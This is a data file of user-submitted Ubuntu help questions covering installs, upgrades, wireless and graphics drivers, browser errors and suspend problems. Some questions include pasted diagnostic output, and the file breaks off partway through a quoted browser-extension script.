520994	ubuntu upgrade 12.04 to 14.04.1 slow unpacking packages	i have started the upgrade from 12.04 to 14.04.01 . the package unpacking is going very slow . my system has been upgrading for about 9 hours . is this normal ?
520995	installation problem of ubuntu 14.04	i want to install ubuntu 14.04 in separate partition alongside windows 8 ( dual boot ) but everytime i am facing an error after i starts installation..the error is ~ unable to copy contents to the selected hard disk it may be too old~ something like that ... what to do now ?
520998	installing drivers for my wireless adapter	i have installed ubuntu 14.04 and can not get my wireless adapter to work , also it does not show or appear in the all settings- > software & updates - > additional drivers . i have also tried using the cd to install the drivers but it does not work .
520999	problem installing build-essential on 14.04.1 lts	i 'm trying to install vm player on ubuntu 14.04.1 lts . i 've seen threads for earlier versions of ubuntu that say to install build-essential and linux headers first . it appears that linux headers is already the newest version . however build-essential will not install for me . sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done e : unable to locate package build-essential is there something i am missing here ? thank you in advance for your help .
521001	where is ubuntu 's drum roll sound located ?	where is ubuntu 's logon sound ( triple drum roll ) located ? it plays right when you see the unity greeter ? when i searched up for the startup/login sound , which is what i thought it was , i got results referring to `` desktop-login.ogg '' , which sounds like this . any help here ?
521003	14.04 lts constant screen flickering after updates	i 've searched for a solution , but there has n't been any . system amd 64x2 tl-52 1.60ghz 2.00 gb shared memory x1200 ati ( amd ) currently running on my windows partition as the flicking is unbearable .
521006	no shift with asus 1215t	i have been an ubuntu user for years without any issue . i recently got an asus 1215t laptop and i can not get the shift keys to work . looking at the keyboard map , i have run `` dpsk-reconfigure keyboard-configure '' and chosen the asus laptop setting and still nothing . does anyone have a clue ? so frustrating . thanks !
521007	warnings during kernel compiling	i 'm compiling custom kernel and during the process i 'm getting warnings such as : drivers/isdn/hardware/eicon/message.c:6115:1 : warning : the frame size of 1184 bytes is larger than 1024 bytes [ -wframe-larger-than= ] the part warning : the frame size of xxxx bytes is larger than 1024 bytes [ -wframe-larger-than= ] are always the same . i 'm find out that it is some compiler-enforced limit for the architecture upon which i 'm building . should i be worried ? if so , anyone have idea how to resolve this ? i 'm on ubuntu 14.04 64bit .
521011	how to zip an archive without including parent directory	help please i want to zip many folders and their directory tree is like so v- something.txt folder folder g.jpg h.jar now whenever i try to zip it it ends creating a zip archive with the v folder instead of the content in it ( the sub directories and files ) so what should do please help
521013	where is the output file ?	i try to follow the examples about quantum circuit plotting with sympy but i can not find the output picture . my os is ubuntu and i type all the command in the terminal of ipython , as you can see here : the output is similar to the one in that website , < sympy.physics.quantum.circuitplot.circuitplot object at 0x7fa125ee5c10 > so , where is the output figure ? in some folder ? ps : i run again and get another similar but different output < sympy.physics.quantum.circuitplot.circuitplot at 0x7f6ff0903690 >
521015	ca n't install git on ubuntu , unable to fetch some archives ?	trying to install git onto ubuntu 13.04 . getting this error message . tried sudo-apt get update and same problem . very new to ubuntu so your help will be appreciated . err http : //us.archive.ubuntu.com/ubuntu/ raring/main git-man all 1:1.8.1.2-1 404 not found [ ip : 91.189.91.14 80 ] err http : //us.archive.ubuntu.com/ubuntu/ raring/main git i386 1:1.8.1.2-1 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/g/git/git-man_1.8.1.2-1_all.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/g/git/git_1.8.1.2-1_i386.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
521017	unable to locate package firefox-trunk , trying to install firefox nightly build on ubuntu 13.10	tryed this googling and is the same in all links : sudo add-apt-repository ppa : ubuntu-mozilla-daily/ppa sudo apt-get update sudo apt-get install firefox-trunk terminal output : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package firefox-trunk i 'm using ubuntu 13.10 , someone can help ?
521019	datel powersaves for 3ds	okay so i bought a datel powersaves device for the 3ds and 2ds and i was worried it wouldn’t work for ubuntu so i check and it doesn’t so is there anyway of me being able to download this software with like terminal or something please help ?
521020	disable nvidia graph card	i have a asus with 2 graph cards - 1 nvidia and 1 intel - and my battery life is being shortened because i think both gpu are being used by ubuntu . i tried some called bumblebee but or i configured it wrong or it did n't work . any idea on how to do this ? i 've seen other posts but none of them worked . sorry for any mistake but english is not my main language . pc : specs ubuntu version : 14.04
521022	ubuntu 14.04.1 php not working	i have a fresh install of ubuntu server 14.04.1 with lamp pre-installed . the web server is working as i can see the test apache2 ubuntu default page in my web browser . however i uploaded my site into the same directory as the default page and php is not working correctly . i have a index.php that loads but displays without php . directoy : /var/www/html/index.php
521023	asus sonicmaster subwoffer for q550lf	i have an asus q550lf laptop and the sonicmaster external speaker has never worked . i contacted asus support , but the response would take a super geek to accomplish and i have received very unreliable advice on my asus desktop so i was hesitant to start tinkering around with the bios , registers and drivers . i see on this site that this question has been asked multiple times but the answer seems to vary by model . perhaps someone can point in the right direction . my q550lf is running windows 8.1 and has an intel core i7 . your help would be appreciated .
521029	supported graphics card for alienware 17	i 'm looking at purchasing a new laptop and installing ubuntu on it . specifically , looking at an alienware 17 at the moment . i wanted to make sure there was some support for the video card however . configuration : 1tb 5400rpm sata 6gb/s + 80gb msata ssd caching 32gb ddr3l at 1600mhz ( 4 x 8g ) intelâž coreâ˘ i7-4910mq processor video card : ? ? ? ? specifically , i 'm looking for a card that will support modest graphics acceleration in linux ( any gaming would be done on the windows partition most likely ) , but definitely will support dual-head , and dynamic power management . i 've read that the nvidia drivers are pretty bad atm , so i was considering the amd radeon r9 m290x route . however , i ca n't seem to find any information on whether it would be supported ( even on the amd website ) . i 've read in previous posts that the m2xx cards are simply rebranded hd xxxxm cards ( ie r9 m290x == hd 8970m ) . is this explicitly true ? like they are literally exactly the same but a different name ? is the m290x supported under ubuntu ? should there be any problems installing on an alienware laptop ? i know its been done , but just wondering what i 'm probably getting myself into as well . thanks for the help !
521032	can not open firefox , get the `` your profile can not be loaded . it may be missing or inaccesible '' prompt	currently using 14.10 , uninstalled and reinstalled firefox the other day and now i get the `` your profile can not be loaded . it may be missing or inaccesible '' . i 've done the sudo chown -r $ user : $ user ~/.mozilla and i 've uninstalled/reinstalled/deleted/rebooted ad nauseum . any assistance i can get on the matter would be greatly appreciat
521035	any favorites/ bookmark file plugin for gedit 3.12 + ?	i want to bookmarks files in gedit so that i can open them easily later . there are some old plugins which used to work for older versions . but is there any working plugin for gedit 3.12+ . i am using gnome shell 3.10 on ubuntu gnome 14.04 . gedit version is 3.12.2 thanks
521036	how much do i really need ? 16gb or 32gb ?	i am planning on getting a `` blu '' phone . i have narrowed it down to the blu `` life pure '' with the 32gb of memory/ram , and the blu `` vivo iv '' with the 16gb . i know 16 is a boat load but on the phone i have now i had to put a 8gb sd card into it and i still seem to get close on filling that up , with hundreds of songs and games like csr racing etc . so would the 16 still be a challenge for me to fill or to be safe should i just get the 32gb memory/ram ? one last thing ... everything about the two phones are the same except on the `` vivo iv '' blu phone , the phone is made up of what looks to be what `` iphones '' are made of `` aluminum and corning gorilla glass3 '' but the `` iphones '' shatter all the time i always see the demolished horribly ... and the blu life pure is made up of plastic which is less sensitive to scratches and cracks ... so that 's it basicly now you know the two specs between the phones soo tell me which would be better ? ( 1 ) the blu `` vivo iv '' with 16gb ram and corning gorilla glass 3 with aluminum body '' or ( 2 ) the blu `` life pure '' with the 32gb and plastic body ? please let me know thx
521037	wireless works on boot disk but not on installed hd	i have only found 2 post on this topic and i tried both of their solutions and neither solved the problem ( updating bios and reinstalling firmware ) . i am fairly new to ubuntu and am not sure what information would be helpful to solve this , but i have provided information shown in the other post below : sudo ifconfig eth0 link encap : ethernet hwaddr 00:1d:60:76 : ae : ad inet addr:192.168.0.112 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21d:60ff : fe76 : aead/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1673 errors:0 dropped:0 overruns:0 frame:0 tx packets:1835 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1399022 ( 1.3 mb ) tx bytes:242556 ( 242.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:645 errors:0 dropped:0 overruns:0 frame:0 tx packets:645 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:68020 ( 68.0 kb ) tx bytes:68020 ( 68.0 kb ) sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 00:1d:60:76 : ae : ad size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.112 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport : ee00 ( size=256 ) memory : fdfff000-fdffffff memory : fdc00000-fdc1ffff *-network unclaimed description : ethernet controller product : ar2413/ar2414 wireless network adapter [ ar5005g ( s ) 802.11bg ] vendor : qualcomm atheros physical id : 5 bus info : pci @ 0000:03:05.0 version : 01 width : 32 bits clock : 33mhz capabilities : msi bus_master cap_list configuration : latency=64 maxlatency=28 mingnt=10 resources : memory : fdef0000-fdefffff wireless info : # # # # # # # # # # wireless info start # # # # # # # # # # report from : 07 sep 2014 08:47 pdt -0700 script from : 05 sep 2014 22:42 utc +0000 # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux 3.13.0-35-generic # 62-ubuntu smp fri aug 15 01:58:42 utc 2014 x86_64 x86_64 x86_64 gnu/linux parameters : ro , quiet , splash , vt.handoff=7 # # # # # desktop # # # # # ubuntu # # # # # lspci # # # # # 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 01 ) subsystem : asustek computer inc. p5b [ 1043:81aa ] kernel driver in use : r8169 03:05.0 ethernet controller [ 0200 ] : castlenet technology inc. device [ 1688:001a ] ( rev 01 ) subsystem : d-link system inc device [ 1186:3a1d ] # # # # # lsusb # # # # # bus 001 device 004 : id 0930:6544 toshiba corp. kingston datatraveler 2.0 stick ( 2gb ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 0461:4d22 primax electronics , ltd bus 002 device 002 : id 045e:078c microsoft corp . bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # # # # # # lsmod # # # # # iwlwifi 169932 0 cfg80211 484040 1 iwlwifi # # # # # interfaces # # # # # auto lo iface lo inet loopback # # # # # ifconfig # # # # # eth0 link encap : ethernet hwaddr < mac addr eth0 > inet addr:192.168.0.112 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :21d:60ff : fe76 : aead/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16494 errors:0 dropped:0 overruns:0 frame:0 tx packets:11564 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:12343690 ( 12.3 mb ) tx bytes:1490142 ( 1.4 mb ) # # # # # iwconfig # # # # # eth0 no wireless extensions . lo no wireless extensions . # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : < mac addr eth0 > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.112 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 132.239.0.252 dns : 132.239.0.250 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # iwlist channels # # # # # eth0 no frequency information . lo no frequency information . # # # # # iwlist scan # # # # # eth0 interface does n't support scanning . lo interface does n't support scanning . # # # # # module infos # # # # # [ iwlwifi ] filename : /lib/modules/3.13.0-35-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-7265-7.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : c2d0f3dfca289585c100e36 depends : cfg80211 intree : y vermagic : 3.13.0-35-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : b1:41:4a : e9:6c:1b:0e : bb:7c:14:1f : a4:05 : c1 : f6 : c9:8e:8a:66 : f0 sig_hashalgo : sha512 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) # # # # # module parameters # # # # # [ iwlwifi ] 11n_disable : 0 amsdu_size_8k : 0 antenna_coupling : 0 bt_coex_active : y fw_restart : y led_mode : 0 nvm_file : ( null ) power_level : 0 power_save : n swcrypto : 0 wd_disable : 1 # # # # # /etc/modules # # # # # lp rtc # # # # # blacklists # # # # # [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist bcm43xx blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac # # # # # rc.local # # # # # exit 0 # # # # # udev rules # # # # # [ /etc/udev/rules.d/70-persistent-net.rules ] # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac addr eth0 > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x168c:0x001a ( ath5k ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' # # # # # dmesg # # # # # # # # # # # # # # # wireless info end # # # # # # # # # # # # i greatly appreciate your help .
521038	ubuntu 14.04 artifacts scren when installing	im new in forum ... i tried to install ubuntu 14 , but after a screen appears that reads `` ubuntu '' ( ubuntu loading ) , my computer screen artifacts ( not visible picture or writing ) computer : proc : amd fx8350 , ram : 10gb , vga : msi ati 7730 please help me ,
521040	how to connect to wifi using terminal	i wanted to connect to wifi using terminal but am facing little problem ... .i used the command `` iwconfig wlan0 essid key `` but it said that it needed permissions ... so i included the sudo command saying `` sudo iwconfig wlan0 essid name key password '' ..but nothing is happening ... i mean the terminal is not showing any output saying that i connected or i failed to connect ... its just not showing any output ..and when i check the connection on top right of the screen ..it still shows that i was not connected to the wifi ... ..can anyone help me ? i know that i can connect to wifi using that top right button ..using gui method ... .but i want to learn doing it using terminal ... .i am relatively new to linux ..so please spare me if the question was kiddish ... thanks in advace
521041	gdebi installer error	e : xipper : arch-independent-package-contains-binary-or-object usr/bin/extract-xiso e : xipper : missing-dependency-on-libc needed by usr/bin/extract-xiso e : xipper : debian-changelog-file-missing e : xipper : no-copyright-file w : xipper : description-synopsis-starts-with-article e : xipper : extended-description-is-empty w : xipper : unknown-section game w : xipper : binary-without-manpage usr/bin/extract-xiso w : xipper : binary-without-manpage usr/bin/xipper.gambas e : xipper : md5sums-lists-nonexistent-file usr/bin/ripper.gambas w : xipper : file-missing-in-md5sums usr/bin/xipper.gambas w : xipper : postinst-has-useless-call-to-update-menus w : xipper : postrm-has-useless-call-to-update-menus lintian finished with exit status 1 the above lintian output from gdebi . it says dependency is not satisfiable gambas2-gb-form . i searched in synaptic manager and found gambas3-gb-form and installed . i am trying to install xipper an iso extractor tool for xbox360 iso files but i get dependency error ?
521042	join wifi and ethernet to share internet but with static ip	hey i am a linux noob and i am trying to setup my home server with ubuntu desktop what i want to do is recieve the internet from the modem on the first floor to my server on the second floor but i then want to bridge that with a ethernet that runs through a switch and into other computers on the network that do n't have a internet connection i would also like to specify my own ip address now i can do this in windows quite easily but i want to try running a linux ( ubuntu ) server just out of curiousity i have managed to get this working buy connecting the wifi adapter to the machine and connecting to the network then going into network connections and setting ethernet to share to other computers and it works however it gives me a set ip address of something like 10.42.0.1 ( or similar ) my current ip addresses follow a 192.168.1.1 format however the only way i can set this for the ethernet adapter is by using the manual option but this of course disables the internet sharing to the other machines i leave the wifi adapter to recieve dhcp address but want to set the ethernet to an address similar to this for familiarity does anyone know how to change the static ip of a connection that has been shared or bridged and has been given a 10.42.0.1 type address ( if that 10.42.0.1 is even static i am unsure have n't run it long enough for the ip address lease to expire ) i have noticed to that when i set the wifi adapter and ethernet to a similar static ip like for example 192.168.1.2 ( wifi ) 192.168.1.3 ( ethernet ) the internet stops working i have to set the ethernet to a different subnet to get them to both work at the same time so for example 192.168.1.2 ( wifi ) 192.168.2.3 ( ethernet )
521043	suspend stopped working in kubuntu 14.04 works in tty	i was using kubuntu 12.04 and suspend and hibernate were working . i re-installed with 14.04 and when it resumes , the gui will show without going into a log in screen , i can briefly move the mouse , then it freezes . however if i first switch to tty1 and use pm-suspend from there , everything works when i resume and switch back . i am not sure what to look at to debug this . in both cases looking at the pm-powersave.log i noticed this error : /usr/lib/pm-utils/power.d/pcie_aspm false sh : echo : i/o error the file /usr/lib/pm-utils/power.d/pcie_aspm # ! /bin/sh aspm= '' /sys/module/pcie_aspm/parameters/policy '' [ -w `` $ aspm '' ] || exit $ na case $ 1 in true ) echo powersave > `` $ aspm '' ; ; false ) echo default > `` $ aspm '' ; ; * ) exit $ na ; ; esac exit 0 sony vaio vpcse13fx using fglrx drivers thank you : )
521045	ku 14.10 no display to projector benq 1070	trying to do : plug hdmi from projector to laptop running kubuntu 14.10 . play video through hdmi running vlc player . what does n't work : no display or info going to projector from laptop . blank screen `` no display '' what kind of works : system recognizing that i 'm trying to use an hdmi goes into some awful 200x600 or something resolution . taskbar gets pushed off screen . usually have to log off in order to reset resolution to 800x600 and then change back to my original 1600x900 . running ati proprietary drivers . everything is up to date .
521051	how to turn off headphones , and only leave enabled analog output ?	how to turn off headphones , and only leave enabled analog output ? ( ubuntu 14.04 )
521052	`` misaligned register '' showing while syetem is on suspend mode	i am using ubuntu 12.04.when i click on the suspend button it suspends but the following text is coming here [ 3265.605475 ] [ drm ] nouveau 0000:00:0d.0 : ======= misaligned reg 0x00600810======= [ 3265.605475 ] [ drm ] nouveau 0000:00:0d.0 : ======= misaligned reg 0x00600810======= though apparently it is not bothering my system , i am just interested to know why the text is coming ? thank you ,
521054	after installed ubuntu on my windows 8.1 , boot menu not shown , i directly deleted the ubuntu hard disk partition	i 'm having hp r014tx , windows 8.1 os , i dual booted ubuntu and its successfully installed after i restarted boot menu option not showing and directly enters into windows 8.1 , i tried installing easy bcd and grub2 and not resolved , so i directly deleted the ubuntu hard disk partition and again allocated into windows partition , but now my problem is if i long press shift while restart and press f9 bios option is still showing ubuntu ( h19xxx ) option like that , so what can i do now ? please help me quickly , i 'm really fed up because i 'm suspecting it may cause my windows os as its my new laptop . i want to ubuntu as well again i can re-install ubuntu ? kindly help quickly . regards , santhosh . +91-9860895438
521056	problem installing micromax mmx 355g	i 'm using ubuntu 13.10 . after much this and that , i was able to install the software on my windows xp . it then ran automatically . but when i open my ubuntu , i can not find a way to install it . the software just contains compressed files which include just more compressed files . how does one install a modem like this ?
521057	trigerring hooks for user-defined events	if i look at the mysql charm ( https : //jujucharms.com/precise/mysql-48/ ? text=mysql # code ) it includes a lot of hooks . according to my understanding each hook is triggered by juju runtime when deploying a resource or some change happens to a relationship between resources . how can i trigger a hook when a certain user-defined event ( cpu utilisation > 95 % ) occurs ? . does juju support to specify user-defined events or do i need to write an external script to automate this ?
521059	i can not download torrents any more ! files i download from torrent sites have the extension .exe	i recently tried to download a few torrents from various sites and found that the file extension of all the files i try to download is .exe , which neither transmission nor vuze nor i know what to do with . this does not happen on all sites , but it seems to be the case on all the better/more popular ones . i am aware of the recent shift from torrent files to magnet links and have used magnet links before with no problem . i 've searched and searched the web for anyone else having this problem , and the one time someone did seem to be , he was told it must be a virus , and that was as far as the conversation went . can anyone help me and explain what 's going on ? thank you !
521063	why chromium version 37 is shutting down when i search something on google ?	i recently upgraded form ubuntu 12.04 lts to ubuntu 14.04 lts . i did this because i had a problem with chromium , whenever i 'd open a new tab to search something on google the browser shut down . i started to get use to the flash problem , but this is a game changer , also , i thought it was a problem with the os , partly because the system started to move a little bit slow . after the upgrade the same problem occurred , although the system started to run faster . i currently have the following version of chromium : 37.0.2062.94 ubuntu 14.04 ( 290621 ) ( 64-bit ) please give me some advice to make this problem stop . i have a lot of bookmarks in this browser and i use it to sync with the device from work . thx
521064	what happen if the executable permission of chmod is revoked	what to do if i change the executable permission of /bin/chmod ? how to recover from that scenario ?
521068	ubuntu 14.04 chromium right click result into uncaught exception	while trying to perform right click on any url on chromium it did n't work . so when i open development console i see uncaught type error . uncaught typeerror : can not read property 'defaultview ' of undefined chrome-extension : //bclaagbljldlbmihblajinlijckggkea/gesture.js:387 4uncaught typeerror : can not read property 'defaultview ' of undefined the script which is pointed is given below // é™çš„é–¢æ•°ã¨ã—ã¦ã‚‚ä½¿ãˆã‚‹ã‚ˆã†ã« recogit.gestureutils = recogit.extend ( { getlinkurl : function ( anode ) { if ( ! anode ) anode = this.sourcenode ; while ( anode ) { if ( ( anode instanceof htmlanchorelement || anode instanceof htmlareaelement ) & & anode.href ) return anode.href ; anode = anode.parentnode ; } return null ; } , getimageurl : function ( anode ) { if ( ! anode ) anode = this.sourcenode ; if ( anode instanceof htmlimageelement & & anode.src ) return anode.src ; else if ( anode instanceof htmlcanvaselement ) return anode.todataurl ( ) ; return null ; } , getmediaurl : function ( anode ) { if ( ! anode ) anode = this.sourcenode ; var imageurl = this.getimageurl ( anode ) ; if ( imageurl ) return imageurl ; else if ( anode instanceof htmlvideoelement || anode instanceof htmlaudioelement ) return anode.currentsrc || anode.src ; else return null ; } , gatherlinkurlsinselection : function ( win ) { var sel = win.getselection ( ) ; if ( ! sel || sel.iscollapsed ) return null ; var doc = win.document ; var ret = [ ] ; for ( var i = 0 ; i < sel.rangecount ; i++ ) { var range = sel.getrangeat ( i ) ; var fragment = range.clonecontents ( ) ; var treewalker = fragment.ownerdocument.createtreewalker ( fragment , nodefilter.show_element , null , true ) ; while ( treewalker.nextnode ( ) ) { var node = treewalker.currentnode ; if ( ( node instanceof htmlanchorelement || node instanceof htmlareaelement ) & & node.href ) { try { this.checkurl ( node.href , doc , true ) ; ret.push ( node.href ) ; } catch ( ex ) { } } } } return ret ; } , } , recogit.impl.gestureutils ) ; // the mouse trail code is based on chrome gestures . // the developer of the original code is os0x . recogit.trail = function ( doc ) { } ; recogit.trail.prototype = { _doc : null , _container : null , _canvas : null , _drawcontext : null , create : function ( doc , x , y ) { this._doc = doc ; this._container = doc.createelementns ( `` http : //www.w3.org/1999/xhtml '' , `` div '' ) ; this._canvas = doc.createelementns ( `` http : //www.w3.org/1999/xhtml '' , `` canvas '' ) ; var height = ( /backcompat/i.test ( doc.compatmode ) ) ? doc.body.clientheight : doc.documentelement.clientheight ; var width = ( /backcompat/i.test ( doc.compatmode ) ) ? doc.body.clientwidth : doc.documentelement.clientwidth ; this._container.setattribute ( `` style '' , `` position : fixed ; top : 0px ; left : 0px ; z-index : 12345 ; display : block ; `` + `` width : `` + width + '' px ; height : `` + height + '' px ; '' ) ; this._canvas.setattribute ( `` style '' , `` position : absolute ; top : 0px ; left : 0px ; display : block ; `` + `` width : `` + width + '' px ; height : `` + height + '' px ; `` + `` zoom : `` + ( 1 / recogit.getzoomratio ( doc ) ) + '' ; `` ) ; this._canvas.width = width ; this._canvas.height = height ; this._container.appendchild ( this._canvas ) ; ( doc.body || doc.documentelement ) .appendchild ( this._container ) ; this._drawcontext = this._canvas.getcontext ( `` 2d '' ) ; this._drawcontext.strokestyle = `` rgba ( 18,89,199,0.6 ) '' ; // åˆæœÿä½ç½®ã¸ this._drawcontext.moveto ( x , y ) ; } , draw : function ( x , y ) { with ( this._drawcontext ) { //beginpath ( ) ; lineto ( x , y ) ; //closepath ( ) ; stroke ( ) ; moveto ( x , y ) ; } } , erase : function ( ) { if ( this._container & & this._container.parentnode ) { this._container.parentnode.removechild ( this._container ) ; this._container = null ; } } , available : function ( ) { return ! ! this._container ; } , } ; recogit.gesture = function ( ) { } ; recogit.gesture.prototype = { html_ns : `` http : //www.w3.org/1999/xhtml '' , state_ready : 0 , state_gesture : 1 , state_rocker : 2 , state_wheel : 3 , state_keypress : 4 , sourcenode : null , _drawarea : null , _lastx : null , _lasty : null , _directionchain : `` '' , _gestureobserver : null , //new : _pressedbutton : 0x0 , _trail : null , attach : function fgh_attach ( adrawarea , aobserver ) { this._drawarea = adrawarea ; this._gestureobserver = aobserver ; this._drawarea.addeventlistener ( `` mousedown '' , this , true ) ; this._drawarea.addeventlistener ( `` mousemove '' , this , true ) ; this._drawarea.addeventlistener ( `` mouseup '' , this , true ) ; this._drawarea.addeventlistener ( `` contextmenu '' , this , true ) ; this._drawarea.addeventlistener ( `` draggesture '' , this , true ) ; this._reloadprefs ( ) ; /* var prefbranch2 = components.classes [ `` @ mozilla.org/preferences-service ; 1 '' ] .getservice ( components.interfaces.nsiprefbranch2 ) ; prefbranch2.addobserver ( this.prefs_domain , this , true ) ; */ } , detach : function fgh_detach ( ) { this._drawarea.removeeventlistener ( `` mousedown '' , this , true ) ; this._drawarea.removeeventlistener ( `` mousemove '' , this , true ) ; this._drawarea.removeeventlistener ( `` mouseup '' , this , true ) ; this._drawarea.removeeventlistener ( `` contextmenu '' , this , true ) ; this._drawarea.removeeventlistener ( `` draggesture '' , this , true ) ; /* var prefbranch2 = components.classes [ `` @ mozilla.org/preferences-service ; 1 '' ] .getservice ( components.interfaces.nsiprefbranch2 ) ; prefbranch2.removeobserver ( this.prefs_domain , this ) ; */ this._cleartimeout ( ) ; this.sourcenode = null ; this._drawarea = null ; this._gestureobserver = null ; this._prefs = null ; } , _reloadprefs : function fgh__reloadprefs ( ) { this._triggerbutton = recogit.getpref ( `` trigger_button '' ) ; //stub : if ( ! this._triggerbutton ) { alert ( `` no trigger `` + this._triggerbutton ) ; } // this._suppressalt = recogit.getpref ( `` suppress.alt '' ) ; this._trailenabled = recogit.getpref ( `` mousetrail '' ) ; this._trailsize = recogit.getpref ( `` mousetrail.size '' ) ; this._trailcolor = recogit.getpref ( `` mousetrail.color '' ) ; this._gesturetimeout = recogit.getpref ( `` gesture_timeout '' ) ; this._mousegestureenabled = recogit.getpref ( `` mousegesture '' ) ; this._wheelgestureenabled = recogit.getpref ( `` wheelgesture '' ) ; this._rockergestureenabled = recogit.getpref ( `` rockergesture '' ) ; this._keypressgestureenabled = recogit.getpref ( `` keypressgesture '' ) ; this._drawarea.removeeventlistener ( `` dommousescroll '' , this , true ) ; this._drawarea.removeeventlistener ( `` click '' , this , true ) ; if ( this._wheelgestureenabled ) this._drawarea.addeventlistener ( `` 